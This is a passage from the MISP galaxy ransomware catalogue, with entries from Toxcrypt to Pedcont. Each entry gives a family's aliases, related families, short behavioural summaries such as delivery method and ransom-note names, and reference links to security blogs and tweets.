http://www.bleepingcomputer.com/forums/t/547708/torrentlocker-ransomware-cracked-and-decrypter-has-been-made/

https://twitter.com/PolarToffee/status/804008236600934403

http://blog.talosintelligence.com/2017/03/crypt0l0cker-torrentlocker-old-dog-new.html

http://id-ransomware.blogspot.ru/2016/05/torrentlocker-ransomware-aes-cbc-2048.html

Toxcrypt

Ransomware

The tag is: misp-galaxy:ransomware="Toxcrypt"

Table 8401. Table References

Links

https://id-ransomware.blogspot.com/2016/06/toxcrypt-ransomware-aes-crypto-0.html

Turkish

Ransomware

The tag is: misp-galaxy:ransomware="Turkish"

Table 8405. Table References

Links

https://twitter.com/struppigel/status/821991600637313024

Turkish Ransom

Ransomware

The tag is: misp-galaxy:ransomware="Turkish Ransom"

Table 8406. Table References

Links

http://www.nyxbone.com/malware/turkishRansom.html

UmbreCrypt

Ransomware CrypBoss Family

The tag is: misp-galaxy:ransomware="UmbreCrypt"

Table 8407. Table References

Links

http://www.thewindowsclub.com/emsisoft-decrypter-hydracrypt-umbrecrypt-ransomware

https://id-ransomware.blogspot.com/2016/06/umbrecrypt-ransomware-aes.html

Ungluk

Ransomware Ransom note instructs to use Bitmessage to get in contact with attacker - Secretishere.key - SECRETISHIDINGHEREINSIDE.KEY - secret.key

The tag is: misp-galaxy:ransomware="Ungluk"

Table 8409. Table References

Links

http://id-ransomware.blogspot.com/2016/05/bitmessage-ransomware-aes-256-25-btc.html

Unlock92

Ransomware

The tag is: misp-galaxy:ransomware="Unlock92 "

Table 8410. Table References

Links

https://twitter.com/malwrhunterteam/status/839038399944224768

http://id-ransomware.blogspot.com/2017/02/unlock26-ransomware.html

VapeLauncher

Ransomware CryptoWire variant

The tag is: misp-galaxy:ransomware="VapeLauncher"

Table 8411. Table References

Links

https://twitter.com/struppigel/status/839771195830648833

VaultCrypt

Ransomware

The tag is: misp-galaxy:ransomware="VaultCrypt"

VaultCrypt is also known as:

  • CrypVault

  • Zlader

VaultCrypt has relationships with:

  • similar: misp-galaxy:ransomware="Zlader" with estimative-language:likelihood-probability="likely"

Table 8412. Table References

Links

http://www.nyxbone.com/malware/russianRansom.html

VBRANSOM 7

Ransomware

The tag is: misp-galaxy:ransomware="VBRANSOM 7"

Table 8413. Table References

Links

https://twitter.com/BleepinComputer/status/817851339078336513

Virlock

Ransomware Polymorphism / Self-replication

The tag is: misp-galaxy:ransomware="Virlock"

Virlock is also known as:

  • NSMF

Table 8415. Table References

Links

http://www.nyxbone.com/malware/Virlock.html

http://www.welivesecurity.com/2014/12/22/win32virlock-first-self-reproducing-ransomware-also-shape-shifter/

WildFire Locker

Ransomware Zyklon variant

The tag is: misp-galaxy:ransomware="WildFire Locker"

WildFire Locker is also known as:

  • Hades Locker

WildFire Locker has relationships with:

  • similar: misp-galaxy:ransomware="Hades" with estimative-language:likelihood-probability="likely"

Table 8417. Table References

Links

https://labs.opendns.com/2016/07/13/wildfire-ransomware-gaining-momentum/

https://id-ransomware.blogspot.com/2016/06/wildfire-locker-ransomware-aes-256-cbc.html

Xorist

Ransomware encrypted files will still have the original non-encrypted header of 0x33 bytes length

The tag is: misp-galaxy:ransomware="Xorist"

Table 8418. Table References

Links

https://support.kaspersky.com/viruses/disinfection/2911

https://decrypter.emsisoft.com/xorist

https://twitter.com/siri_urz/status/1006833669447839745

https://id-ransomware.blogspot.com/2016/06/xrtn-ransomware-rsa-1024-gnu-privacy.html

XRTN

Ransomware VaultCrypt family

The tag is: misp-galaxy:ransomware="XRTN "

You Have Been Hacked!!!

Ransomware Attempt to steal passwords

The tag is: misp-galaxy:ransomware="You Have Been Hacked!!!"

Table 8419. Table References

Links

https://twitter.com/malwrhunterteam/status/808280549802418181

Zcrypt

Ransomware

The tag is: misp-galaxy:ransomware="Zcrypt"

Zcrypt is also known as:

  • Zcryptor

Table 8420. Table References

Links

https://blogs.technet.microsoft.com/mmpc/2016/05/26/link-lnk-to-ransom/

http://id-ransomware.blogspot.com/2016/05/zcrypt-ransomware-rsa-2048-email.html

Zlader

Ransomware VaultCrypt family

The tag is: misp-galaxy:ransomware="Zlader"

Zlader is also known as:

  • Russian

  • VaultCrypt

  • CrypVault

Zlader has relationships with:

  • similar: misp-galaxy:ransomware="VaultCrypt" with estimative-language:likelihood-probability="likely"

Table 8422. Table References

Links

http://www.nyxbone.com/malware/russianRansom.html

Zorro

Ransomware

The tag is: misp-galaxy:ransomware="Zorro"

Table 8423. Table References

Links

https://twitter.com/BleepinComputer/status/844538370323812353

http://id-ransomware.blogspot.com/2017/03/zorro-ransomware.html

Zyklon

Ransomware Hidden Tear family, GNL Locker variant

The tag is: misp-galaxy:ransomware="Zyklon"

Zyklon is also known as:

  • GNL Locker

  • Zyklon Locker

Zyklon has relationships with:

  • similar: misp-galaxy:ransomware="GNL Locker" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Zyklon" with estimative-language:likelihood-probability="likely"

Table 8424. Table References

Links

http://id-ransomware.blogspot.com/2016/05/zyklon-locker-ransomware-windows-250.html

vxLock

Ransomware

The tag is: misp-galaxy:ransomware="vxLock"

Table 8425. Table References

Links

https://id-ransomware.blogspot.com/2017/01/vxlock-ransomware.html

Jaff

We recently observed several large scale email campaigns that were attempting to distribute a new variant of ransomware that has been dubbed "Jaff". Interestingly we identified several characteristics that we have previously observed being used during Dridex and Locky campaigns. In a short period of time, we observed multiple campaigns featuring high volumes of malicious spam emails being distributed, each using a PDF attachment with an embedded Microsoft Word document functioning as the initial downloader for the Jaff ransomware.

The tag is: misp-galaxy:ransomware="Jaff"

Jaff has relationships with:

  • similar: misp-galaxy:malpedia="Jaff" with estimative-language:likelihood-probability="likely"

Table 8426. Table References

Links

http://blog.talosintelligence.com/2017/05/jaff-ransomware.html

https://www.bleepingcomputer.com/news/security/jaff-ransomware-distributed-via-necurs-malspam-and-asking-for-a-3-700-ransom/

http://id-ransomware.blogspot.com/2017/05/jaff-ransomware.html

Uiwix Ransomware

Using EternalBlue SMB Exploit To Infect Victims

The tag is: misp-galaxy:ransomware="Uiwix Ransomware"

Uiwix Ransomware is also known as:

  • UIWIX

Table 8427. Table References

Links

https://www.bleepingcomputer.com/news/security/uiwix-ransomware-using-eternalblue-smb-exploit-to-infect-victims/

http://id-ransomware.blogspot.com/2017/05/uiwix-ransomware.html

SOREBRECT

Fileless, Code-injecting Ransomware

The tag is: misp-galaxy:ransomware="SOREBRECT"

Table 8428. Table References

Links

http://blog.trendmicro.com/trendlabs-security-intelligence/analyzing-fileless-code-injecting-sorebrect-ransomware/

Cyron

claims it detected "Children Pornsites" in your browser history

The tag is: misp-galaxy:ransomware="Cyron"

Table 8429. Table References

Links

https://twitter.com/struppigel/status/899524853426008064

https://id-ransomware.blogspot.com/2017/08/cyron-ransomware.html

Kappa

Made with OXAR builder; decryptable

The tag is: misp-galaxy:ransomware="Kappa"

Table 8430. Table References

Links

https://twitter.com/struppigel/status/899528477824700416

Trojan Dz

CyberSplitter variant

The tag is: misp-galaxy:ransomware="Trojan Dz"

Table 8431. Table References

Links

https://twitter.com/struppigel/status/899537940539478016

Xolzsec

ransomware written by self-proclaimed script kiddies that should really be considered trollware

The tag is: misp-galaxy:ransomware="Xolzsec"

Table 8432. Table References

Links

https://twitter.com/struppigel/status/899916577252028416

http://id-ransomware.blogspot.com/2017/08/xolzsec-ransomware.html

FlatChestWare

HiddenTear variant; decryptable

The tag is: misp-galaxy:ransomware="FlatChestWare"

Table 8433. Table References

Links

https://twitter.com/struppigel/status/900238572409823232

https://id-ransomware.blogspot.com/2017/08/flatchestware-ransomware.html

SynAck

The ransomware does not use a customized desktop wallpaper to signal its presence, and the only way to discover that SynAck has infected your PC is by the ransom notes dropped on the user’s desktop, named in the format RESTORE_INFO-[id].txt, for example RESTORE_INFO-4ABFA0EF.txt. In addition, SynAck also appends its own extension at the end of all files it encrypted. The extension is ten random alphabetic characters, different for each file, for example test.jpg.XbMiJQiuoh. Experts believe the group behind SynAck uses RDP brute-force attacks to access remote computers and manually download and install the ransomware.

The tag is: misp-galaxy:ransomware="SynAck"

SynAck is also known as:

  • Syn Ack

SynAck has relationships with:

  • similar: misp-galaxy:malpedia="SynAck" with estimative-language:likelihood-probability="likely"

Table 8434. Table References

Links

https://www.bleepingcomputer.com/news/security/synack-ransomware-sees-huge-spike-in-activity/

https://www.bleepingcomputer.com/news/security/synack-ransomware-uses-process-doppelg-nging-technique/

https://id-ransomware.blogspot.com/2017/09/synack-ransomware.html

SyncCrypt

A new ransomware called SyncCrypt was discovered by Emsisoft security researcher xXToffeeXx that is being distributed by spam attachments containing WSF files. When installed these attachments will encrypt a computer and append the .kk extension to encrypted files.

The tag is: misp-galaxy:ransomware="SyncCrypt"

SyncCrypt has relationships with:

  • similar: misp-galaxy:malpedia="SyncCrypt" with estimative-language:likelihood-probability="likely"

Table 8435. Table References

Links

https://www.bleepingcomputer.com/news/security/synccrypt-ransomware-hides-inside-jpg-files-appends-kk-extension/

http://id-ransomware.blogspot.com/2017/08/synccrypt-ransomware.html

Bad Rabbit

On October 24, 2017, Cisco Talos was alerted to a widescale ransomware campaign affecting organizations across eastern Europe and Russia. As was the case in previous situations, we quickly mobilized to assess the situation and ensure that customers remain protected from this and other threats as they emerge across the threat landscape. There have been several large scale ransomware campaigns over the last several months. This appears to have some similarities to Nyetya in that it is also based on Petya ransomware. Major portions of the code appear to have been rewritten. The distribution does not appear to have the sophistication of the supply chain attacks we have seen recently.

The tag is: misp-galaxy:ransomware="Bad Rabbit"

Bad Rabbit is also known as:

  • BadRabbit

  • Bad-Rabbit

Bad Rabbit has relationships with:

  • similar: misp-galaxy:malpedia="EternalPetya" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:tool="NotPetya" with estimative-language:likelihood-probability="likely"

Table 8436. Table References

Links

http://blog.talosintelligence.com/2017/10/bad-rabbit.html

https://id-ransomware.blogspot.com/2017/10/badrabbit-ransomware.html

https://www.welivesecurity.com/2017/10/24/bad-rabbit-not-petya-back/

https://securelist.com/bad-rabbit-ransomware/82851/

http://www.intezer.com/notpetya-returns-bad-rabbit/

Halloware

A malware author by the name of Luc1F3R is peddling a new ransomware strain called Halloware for the lowly price of $40. Based on evidence gathered by Bleeping Computer, Luc1F3R started selling his ransomware this week, beginning Thursday.

The tag is: misp-galaxy:ransomware="Halloware"

Table 8437. Table References

Links

https://www.bleepingcomputer.com/news/security/halloware-ransomware-on-sale-on-the-dark-web-for-only-40/

http://id-ransomware.blogspot.com/2017/11/halloware-ransomware.html

StorageCrypt

Recently BleepingComputer has received a flurry of support requests for a new ransomware being named StorageCrypt that is targeting NAS devices such as the Western Digital My Cloud. Victims have been reporting that their files have been encrypted and a note left with a ransom demand of between .4 and 2 bitcoins to get their files back. Users have also reported that each share on their NAS device contains an Autorun.inf file and a Windows executable named 美女与野兽.exe, which translates to Beauty and the Beast. From the samples BleepingComputer has received, this Autorun.inf is an attempt to spread the 美女与野兽.exe file to other computers that open the folders on the NAS devices.

The tag is: misp-galaxy:ransomware="StorageCrypt"

Table 8438. Table References

Links

https://www.bleepingcomputer.com/news/security/storagecrypt-ransomware-infecting-nas-devices-using-sambacry/

https://id-ransomware.blogspot.com/2017/11/storagecrypter.html

HC7

A new ransomware called HC7 is infecting victims by hacking into Windows computers that are running publicly accessible Remote Desktop services. Once the developers gain access to the hacked computer, the HC7 ransomware is then installed on all accessible computers on the network. Originally released as HC6, victims began posting about it in the BleepingComputer forums towards the end of November. As this is a Python-to-exe executable, once the script was extracted ID Ransomware creator Michael Gillespie was able to determine that it was decryptable and released a decryptor. Unfortunately, a few days later, the ransomware developers released a new version called HC7 that was not decryptable. This is because they removed the hard-coded encryption key and instead switched to inputting the key as a command line argument when the attackers run the ransomware executable. Thankfully, there may be a way to get around that as well so that victims can recover their keys.

The tag is: misp-galaxy:ransomware="HC7"

Table 8439. Table References

Links

https://www.bleepingcomputer.com/news/security/hc7-gotya-ransomware-installed-via-remote-desktop-services-spread-with-psexec/

https://id-ransomware.blogspot.com/2017/12/hc7-ransomware.html

qkG

Security researchers have discovered a new ransomware strain named qkG that targets only Office documents for encryption and infects the Word default document template to propagate to new Word documents opened through the same Office suite on the same computer.

The tag is: misp-galaxy:ransomware="qkG"

qkG is also known as:

  • QkG

Table 8441. Table References

Links

https://www.bleepingcomputer.com/news/security/qkg-ransomware-encrypts-only-word-documents-hides-and-spreads-via-macros/

http://id-ransomware.blogspot.com/2017/11/qkg-ransomware.html

Scarab

The Scarab ransomware is a relatively new ransomware strain that was first spotted by security researcher Michael Gillespie in June this year. Written in Delphi, the first version was simplistic and was recognizable via the ".scarab" extension it appended after the names of encrypted files. Malwarebytes researcher Marcelo Rivera spotted a second version in July that used the ".scorpio" extension. The version spotted with the Necurs spam today has reverted back to using the .scarab extension. The current version of Scarab encrypts files but, unlike previous versions, does not change the original file names. This Scarab version appends each file’s name with the ".[suupport@protonmail.com].scarab" extension. Scarab also deletes shadow volume copies and drops a ransom note named "IF YOU WANT TO GET ALL YOUR FILES BACK, PLEASE READ THIS.TXT" on users' computers, which it opens immediately.

The tag is: misp-galaxy:ransomware="Scarab"

Table 8442. Table References

Links

https://www.bleepingcomputer.com/news/security/scarab-ransomware-pushed-via-massive-spam-campaign/

https://labsblog.f-secure.com/2017/11/23/necurs-business-is-booming-in-a-new-partnership-with-scarab-ransomware/

https://blogs.forcepoint.com/security-labs/massive-email-campaign-spreads-scarab-ransomware

https://twitter.com/malwrhunterteam/status/933643147766321152

https://myonlinesecurity.co.uk/necurs-botnet-malspam-delivering-a-new-ransomware-via-fake-scanner-copier-messages/

https://twitter.com/demonslay335/status/1006222754385924096

https://twitter.com/demonslay335/status/1006908267862396928

https://twitter.com/demonslay335/status/1007694117449682945

https://twitter.com/demonslay335/status/1049316344183836672

https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-october-12th-2018-notpetya-gandcrab-and-more/

https://twitter.com/Amigo_A_/status/1039105453735784448

https://twitter.com/GrujaRS/status/1072057088019496960

http://id-ransomware.blogspot.com/2017/06/scarab-ransomware.html

File Spider

A new ransomware called File Spider is being distributed through spam that targets victims in Bosnia and Herzegovina, Serbia, and Croatia. These spam emails contain malicious Word documents that will download and install the File Spider ransomware onto a victim's computer. File Spider is currently being distributed through malspam that appears to be targeting countries such as Croatia, Bosnia and Herzegovina, and Serbia. The spam starts with subjects like "Potrazivanje dugovanja", which translates to "Debt Collection", and its message, according to Google Translate, appears to be in Serbian.

The tag is: misp-galaxy:ransomware="File Spider"

File Spider is also known as:

  • Spider

Table 8443. Table References

Links

https://www.bleepingcomputer.com/news/security/file-spider-ransomware-targeting-the-balkans-with-malspam/

http://id-ransomware.blogspot.com/2017/12/file-spider-ransomware.html

FileCoder

A barely functional piece of macOS ransomware, written in Swift.

The tag is: misp-galaxy:ransomware="FileCoder"

FileCoder is also known as:

  • FindZip

  • Patcher

FileCoder has relationships with:

  • similar: misp-galaxy:ransomware="Patcher" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Patcher" with estimative-language:likelihood-probability="likely"

Table 8444. Table References

Links

https://objective-see.com/blog/blog_0x25.html#FileCoder

MacRansom

A basic piece of macOS ransomware, offered via a 'malware-as-a-service' model.

The tag is: misp-galaxy:ransomware="MacRansom"

MacRansom has relationships with:

  • similar: misp-galaxy:malpedia="MacRansom" with estimative-language:likelihood-probability="likely"

Table 8445. Table References

Links

https://objective-see.com/blog/blog_0x25.html

GandCrab

A new ransomware called GandCrab was released towards the end of last week that is currently being distributed via exploit kits. GandCrab has some interesting features not seen before in a ransomware, such as being the first to accept the DASH currency and the first to utilize the Namecoin powered .BIT tld.

The tag is: misp-galaxy:ransomware="GandCrab"

GandCrab has relationships with:

  • dropped-by: misp-galaxy:exploit-kit="Fallout" with estimative-language:likelihood-probability="almost-certain"

Table 8446. Table References

Links

https://www.bleepingcomputer.com/news/security/gandcrab-ransomware-distributed-by-exploit-kits-appends-gdcb-extension/

https://www.bleepingcomputer.com/news/security/gandcrab-ransomware-being-distributed-via-malspam-disguised-as-receipts/

https://www.bleepingcomputer.com/news/security/gandcrab-ransomware-version-2-released-with-new-crab-extension-and-other-changes/

https://www.bleepingcomputer.com/news/security/gandcrab-version-3-released-with-autorun-feature-and-desktop-background/

https://www.bleepingcomputer.com/news/security/new-fallout-exploit-kit-drops-gandcrab-ransomware-or-redirects-to-pups/

https://www.bleepingcomputer.com/news/security/gandcrab-v5-ransomware-utilizing-the-alpc-task-scheduler-exploit/

https://id-ransomware.blogspot.com/2018/01/gandcrab-ransomware.html

ShurL0ckr

Security researchers uncovered a new ransomware named ShurL0ckr (detected by Trend Micro as RANSOM_GOSHIFR.B) that reportedly bypasses detection mechanisms of cloud platforms. Like Cerber and Satan, ShurL0ckr’s operators further monetize the ransomware by peddling it as a turnkey service to fellow cybercriminals, allowing them to earn additional income through a commission from each victim who pays the ransom.

The tag is: misp-galaxy:ransomware="ShurL0ckr"

Table 8447. Table References

Links

https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/shurl0ckr-ransomware-as-a-service-peddled-on-dark-web-can-reportedly-bypass-cloud-applications

Cryakl

ransomware

The tag is: misp-galaxy:ransomware="Cryakl"

Cryakl has relationships with:

  • similar: misp-galaxy:ransomware="Offline ransomware" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Cryakl" with estimative-language:likelihood-probability="likely"

Table 8448. Table References

Links

https://sensorstechforum.com/fr/fairytail-files-virus-cryakl-ransomware-remove-restore-data/

https://www.technologynews.tech/cryakl-ransomware-virus

http://www.zdnet.com/article/cryakl-ransomware-decryption-keys-now-available-for-free/

Thanatos

first ransomware seen to ask for payment to be made in Bitcoin Cash (BCH)

The tag is: misp-galaxy:ransomware="Thanatos"

Thanatos has relationships with:

  • similar: misp-galaxy:malpedia="Thanatos" with estimative-language:likelihood-probability="likely"

Table 8449. Table References

Links

https://mobile.twitter.com/EclecticIQ/status/968478323889332226

https://www.eclecticiq.com/resources/thanatos—ransomware-first-ransomware-ask-payment-bitcoin-cash?type=intel-report

http://id-ransomware.blogspot.com/2018/02/thanatos-ransomware.html

RSAUtil

RSAUtil is distributed by the developer hacking into remote desktop services and uploading a package of files. This package contains a variety of tools, a config file that determines how the ransomware executes, and the ransomware itself.

The tag is: misp-galaxy:ransomware="RSAUtil"

RSAUtil is also known as:

  • Vagger

  • DONTSLIP

Table 8450. Table References

Links

https://www.securityweek.com/rsautil-ransomware-distributed-rdp-attacks

https://www.bleepingcomputer.com/news/security/rsautil-ransomware-helppme-india-com-installed-via-hacked-remote-desktop-services/

http://id-ransomware.blogspot.lu/2017/04/rsautil-ransomware.html

http://id-ransomware.blogspot.lu/2017/04/

Qwerty Ransomware

A new ransomware has been discovered that utilizes the legitimate GnuPG, or GPG, encryption program to encrypt a victim’s files. Currently in the wild, this ransomware is called Qwerty Ransomware and will encrypt a victim’s files, overwrite the originals, and then append the .qwerty extension to an encrypted file’s name.

The tag is: misp-galaxy:ransomware="Qwerty Ransomware"

Table 8451. Table References

Links

https://www.bleepingcomputer.com/news/security/qwerty-ransomware-utilizes-gnupg-to-encrypt-a-victims-files/

Zenis Ransomware

A new ransomware was discovered this week by MalwareHunterTeam called Zenis Ransomware. While it is currently unknown how Zenis is being distributed, multiple victims have already become infected with this ransomware. What is most disturbing about Zenis is that it not only encrypts your files, but also purposely deletes your backups.

The tag is: misp-galaxy:ransomware="Zenis Ransomware"

Table 8452. Table References

Links

https://www.bleepingcomputer.com/news/security/zenis-ransomware-encrypts-your-data-and-deletes-your-backups/

https://id-ransomware.blogspot.com/2018/03/zenis-ransomware.html

Black Ruby

A new ransomware was discovered this week by MalwareHunterTeam called Black Ruby. This ransomware will encrypt the files on a computer, scramble the file name, and then append the BlackRuby extension. To make matters worse, Black Ruby will also install a Monero miner on the computer that utilizes as much of the CPU as it can. Discovered on February 6, 2018. May have been distributed through unknown vectors. Will not encrypt a machine if its IP address is identified as coming from Iran; this feature enables actors to avoid a particular Iranian cybercrime law that prohibits Iran-based actors from attacking Iranian victims. Encrypts files on the infected machine, scrambles files, and appends the .BlackRuby extension to them. Installs a Monero miner on the infected computer that utilizes the machine’s maximum CPU power. Delivers a ransom note in English asking for US$650 in Bitcoins. Might be installed via Remote Desktop Services.

The tag is: misp-galaxy:ransomware="Black Ruby"

Black Ruby is also known as:

  • BlackRuby

Table 8454. Table References

Links

https://www.bleepingcomputer.com/news/security/black-ruby-ransomware-skips-victims-in-iran-and-adds-a-miner-for-good-measure/

https://www.accenture.com/t20180803T064557Zw/us-en/_acnmedia/PDF-83/Accenture-Cyber-Threatscape-Report-2018.pdf

WhiteRose

A new ransomware has been discovered by MalwareHunterTeam that is based off of the InfiniteTear ransomware family, of which BlackRuby and Zenis are members. When this ransomware infects a computer it will encrypt the files, scramble the filenames, and append the .WHITEROSE extension to them.

The tag is: misp-galaxy:ransomware="WhiteRose"

Table 8455. Table References

Links

https://www.bleepingcomputer.com/news/security/the-whiterose-ransomware-is-decryptable-and-tells-a-strange-story/

http://id-ransomware.blogspot.com/2018/03/whiterose-ransomware.html

PUBG Ransomware

In what could only be a joke, a new ransomware has been discovered called "PUBG Ransomware" that will decrypt your files if you play the game called PlayerUnknown’s Battlegrounds. Discovered by MalwareHunterTeam, when the PUBG Ransomware is launched it will encrypt a user’s files and folders on the user’s desktop and append the .PUBG extension to them. When it has finished encrypting the files, it will display a screen giving you two methods that you can use to decrypt the encrypted files.

The tag is: misp-galaxy:ransomware="PUBG Ransomware"

Table 8456. Table References

Links

https://www.bleepingcomputer.com/news/security/pubg-ransomware-decrypts-your-files-if-you-play-playerunknowns-battlegrounds/

https://id-ransomware.blogspot.com/2018/04/pubg-ransomware.html

LockCrypt

LockCrypt is an example of yet another simple ransomware created and used by unsophisticated attackers. Its authors ignored well-known guidelines about the proper use of cryptography. The internal structure of the application is also unprofessional. Sloppy, unprofessional code is pretty commonplace when ransomware is created for manual distribution. Authors don’t take much time preparing the attack or the payload. Instead, they’re rather focused on a fast and easy gain, rather than on creating something for the long run. Because of this, they could easily be defeated.

The tag is: misp-galaxy:ransomware="LockCrypt"

Table 8457. Table References

Links

https://www.bleepingcomputer.com/news/security/lockcrypt-ransomware-cracked-due-to-bad-crypto/

https://twitter.com/malwrhunterteam/status/1034436350748053504

https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-august-31st-2018-devs-on-vacation/

http://id-ransomware.blogspot.com/2017/06/lockcrypt-ransomware.html

Magniber Ransomware

Magniber is a new ransomware being distributed by the Magnitude Exploit Kit that appears to be the successor to the Cerber Ransomware. While many aspects of the Magniber Ransomware are different than Cerber, the payment system and the files it encrypts are very similar.

The tag is: misp-galaxy:ransomware="Magniber Ransomware"

Table 8458. Table References

Links

https://www.bleepingcomputer.com/news/security/decrypters-for-some-versions-of-magniber-ransomware-released/

https://www.bleepingcomputer.com/news/security/goodbye-cerber-hello-magniber-ransomware/

https://twitter.com/demonslay335/status/1005133410501787648

http://id-ransomware.blogspot.com/2017/10/my-decryptor-ransomware.html

Vurten

The tag is: misp-galaxy:ransomware="Vurten"

Table 8459. Table References

Links

https://twitter.com/siri_urz/status/981191281195044867

http://id-ransomware.blogspot.com/2018/04/vurten-ransomware.html

Reveton ransomware

A ransomware family that targets users from certain countries or regions. It locks the computer and displays a location-specific webpage that covers the desktop and demands that the user pay a fine for the supposed possession of illicit material. The Reveton ransomware is one of the first screen-locking ransomware strains, and it appeared when Bitcoin was still in its infancy, and before it became the cryptocurrency of choice in all ransomware operations. Instead, Reveton operators asked victims to buy GreenDot MoneyPak vouchers, take the code on the voucher and enter it in the Reveton screen locker.

The tag is: misp-galaxy:ransomware="Reveton ransomware"

Table 8460. Table References

Links

https://www.bleepingcomputer.com/news/security/microsoft-engineer-charged-in-reveton-ransomware-case/

https://en.wikipedia.org/wiki/Ransomware#Reveton

https://nakedsecurity.sophos.com/2012/08/29/reveton-ransomware-exposed-explained-and-eliminated/

Fusob

Fusob is one of the major mobile ransomware families. Between April 2015 and March 2016, about 56 percent of accounted mobile ransomware was Fusob. Like a typical mobile ransomware, it employs scare tactics to extort people to pay a ransom. The program pretends to be an accusatory authority, demanding that the victim pay a fine from $100 to $200 USD or otherwise face a fictitious charge. Rather surprisingly, Fusob suggests using iTunes gift cards for payment. Also, a timer ticking down on the screen adds to the users’ anxiety. In order to infect devices, Fusob masquerades as a pornographic video player. Thus, victims, thinking it is harmless, unwittingly download Fusob. When Fusob is installed, it first checks the language used in the device. If it uses Russian or certain Eastern European languages, Fusob does nothing. Otherwise, it proceeds on to lock the device and demand ransom. Among victims, about 40% of them are in Germany with the United Kingdom and the United States following with 14.5% and 11.4% respectively. Fusob has lots in common with Small, which is another major family of mobile ransomware. They represented over 93% of mobile ransomwares between 2015 and 2016.

The tag is: misp-galaxy:ransomware="Fusob"

Table 8461. Table References

Links

https://en.wikipedia.org/wiki/Ransomware#Fusob

OXAR

The tag is: misp-galaxy:ransomware="OXAR"

Table 8462. Table References

Links

https://twitter.com/demonslay335/status/981270787905720320

BansomQare Manna Ransomware

The tag is: misp-galaxy:ransomware="BansomQare Manna Ransomware"

Table 8463. Table References

Links

http://id-ransomware.blogspot.com/2018/03/bansomqarewanna-ransomware.html

Haxerboi Ransomware

The tag is: misp-galaxy:ransomware="Haxerboi Ransomware"

MC Ransomware

Supposed joke ransomware; decrypts when running an executable with the string "Minecraft"

The tag is: misp-galaxy:ransomware="MC Ransomware"

Table 8465. Table References

Links

https://www.bleepingcomputer.com/news/security/minecraft-and-cs-go-ransomware-strive-for-media-attention/

CSGO Ransomware

Supposed joke ransomware; decrypts when running an executable with the string "csgo"

The tag is: misp-galaxy:ransomware="CSGO Ransomware"

Table 8466. Table References

Links

https://www.bleepingcomputer.com/news/security/minecraft-and-cs-go-ransomware-strive-for-media-attention/

NMCRYPT Ransomware

The NMCRYPT Ransomware is a generic file encryption Trojan that was detected in the middle of April 2018. The NMCRYPT Ransomware is a file encoder Trojan that is designed to make data unreadable and convince users to pay a fee for unlocking content on the infected computers. The NMCRYPT Ransomware is nearly identical to hundreds of variants of the HiddenTear open-source ransomware and compromised users are unable to use the Shadow Volume snapshots made by Windows to recover. Unfortunately, the NMCRYPT Ransomware disables the native recovery features on Windows, and you need third-party applications to rebuild your data.

The tag is: misp-galaxy:ransomware="NMCRYPT Ransomware"

Table 8468. Table References

Links

https://sensorstechforum.com/nmcrypt-files-ransomware-virus-remove-restore-data/

https://www.enigmasoftware.com/nmcryptansomware-removal/

Iron

It is currently unknown if Iron is indeed a new variant by the same creators of Maktub, or if it was simply inspired by the latter, by copying the design for the payment portal for example. We know the Iron ransomware has mimicked at least three ransomware families: Maktub (payment portal design), DMA Locker (Iron Unlocker, decryption tool) and Satan (exclusion list).

The tag is: misp-galaxy:ransomware="Iron"

Table 8469. Table References

Links

https://bartblaze.blogspot.lu/2018/04/maktub-ransomware-possibly-rebranded-as.html

http://id-ransomware.blogspot.com/2018/04/ironlocker-ransomware.html

Tron ransomware

The tag is: misp-galaxy:ransomware="Tron ransomware"

Table 8470. Table References

Links

https://twitter.com/malwrhunterteam/status/985152346773696512

http://id-ransomware.blogspot.com/2018/04/tron-ransomware.html

Unnamed ramsomware 1

A new in-development ransomware was discovered that has an interesting characteristic. Instead of the distributed executable performing the ransomware functionality, the executable compiles an embedded encrypted C# program at runtime and launches it directly into memory.

The tag is: misp-galaxy:ransomware="Unnamed ramsomware 1"

Table 8471. Table References

Links

https://www.bleepingcomputer.com/news/security/new-c-ransomware-compiles-itself-at-runtime/

HPE iLO 4 Ransomware

Attackers are targeting Internet accessible HPE iLO 4 remote management interfaces, supposedly encrypting the hard drives, and then demanding Bitcoins to get access to the data again. According to the victim, the attackers are demanding 2 bitcoins to gain access to the drives again. The attackers will also provide a bitcoin address to the victim that should be used for payment. These bitcoin addresses appear to be unique per victim as the victim’s was different from other reported ones. An interesting part of the ransom note is that the attackers state that the ransom price is not negotiable unless the victims are from Russia. This is common for Russian based attackers, who in many cases try to avoid infecting Russian victims. Finally, could this be a decoy/wiper rather than an actual true ransomware attack? Ransomware attacks typically provide a unique ID to the victim in order to distinguish one victim from another. This prevents a victim from "stealing" another victim’s payment and using it to unlock their computer. In a situation like this, where no unique ID is given to identify the encrypted computer and the email is publicly accessible, it could be a case where the main goal is to wipe a server or act as a decoy for another attack.

The tag is: misp-galaxy:ransomware="HPE iLO 4 Ransomware"

Table 8472. Table References

Links

https://www.bleepingcomputer.com/news/security/ransomware-hits-hpe-ilo-remote-management-interfaces/

https://twitter.com/M_Shahpasandi/status/989157283799162880

https://id-ransomware.blogspot.com/2018/04/hpe-ilo-ransomware.html

Sigrun Ransomware

When Sigrun is executed it will first check "HKEY_CURRENT_USER\Keyboard Layout\Preload" to see if it is set to the Russian layout. If the computer is using a Russian layout, it will not encrypt the computer and just delete itself. Otherwise Sigrun will scan a computer for files to encrypt and skip any that match certain extensions, filenames, or are located in particular folders.

The tag is: misp-galaxy:ransomware="Sigrun Ransomware"

Table 8473. Table References

Links

https://www.bleepingcomputer.com/news/security/sigrun-ransomware-author-decrypting-russian-victims-for-free/

http://id-ransomware.blogspot.com/2018/05/sigrun-ransomware.html

CryBrazil

Mostly Hidden Tear with some codes from Eda2 & seems compiled w/ Italian VS. Maybe related to OpsVenezuela?

The tag is: misp-galaxy:ransomware="CryBrazil"

Table 8474. Table References

Links

https://twitter.com/malwrhunterteam/status/1002953824590614528

https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-june-8th-2018-crybrazil-cryptconsole-and-magniber/

https://id-ransomware.blogspot.com/2018/06/crybrazil-ransomware.html

Pedcont

New destructive ransomware called Pedcont that claims to encrypt files because the victim has accessed illegal content on the deep web. The screen then goes blank and becomes unresponsive.

